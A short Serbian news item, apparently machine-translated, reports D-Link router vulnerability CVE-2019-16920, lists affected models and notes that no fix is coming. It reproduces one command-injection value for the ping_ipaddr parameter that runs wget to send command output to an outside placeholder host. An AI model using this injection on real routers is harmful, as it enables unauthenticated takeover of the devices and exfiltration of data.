Рањивост у Д-Линк рутерима која се може даљински искористити

У Д-Линк бежичним рутерима идентификован опасна рањивост (ЦВЕ-2019–16920), који вам омогућава да даљински извршите код на страни уређаја слањем специјалног захтева руковаоцу „пинг_тест“, којем се може приступити без аутентификације.

Занимљиво је да према програмерима фирмвера, позив „пинг_тест“ треба да се изврши тек након аутентификације, али у стварности се позива у сваком случају, без обзира на пријављивање на веб интерфејс. Конкретно, када се приступи скрипти аппли_сец.цги и проследи параметар „ацтион=пинг_тест“, скрипта преусмерава на страницу за потврду идентитета, али у исто време обавља акцију повезану са пинг_тестом. За извршење кода коришћена је још једна рањивост у самом пинг_тест, који позива услужни програм за пинг без прописне провере исправности ИП адресе послате на тестирање. На пример, да бисте позвали услужни програм вгет и пренели резултате команде „ецхо 1234“ на спољни хост, само наведите параметар „пинг_ипаддр=127.0.0.1%0авгет%20-П%20/тмп/%20хттп:// тест.тест/?$( ецхо 1234)".

Рањивост у Д-Линк рутерима која се може даљински искористити

Присуство рањивости је званично потврђено у следећим моделима:

  • ДИР-655 са фирмвером 3.02б05 или старијим;
  • ДИР-866Л са фирмвером 1.03б04 или старијим;
  • ДИР-1565 са фирмвером 1.01 или старијим;
  • ДИР-652 (нема информација о проблематичним верзијама фирмвера)

Период подршке за ове моделе је већ истекао, па је Д-Линк on је навео, који неће објавити ажурирања за њих како би елиминисала рањивост, не препоручује њихово коришћење и саветује да их замените новим уређајима. Као безбедносно решење, можете ограничити приступ веб интерфејсу само на поуздане ИП адресе.

Касније је откривено да је рањивост такође утиче на модели ДИР-855Л, ДАП-1533, ДИР-862Л, ДИР-615, ДИР-835 и ДИР-825, планови за објављивање ажурирања за које још нису познати.

Извор: опеннет.ру

Додај коментар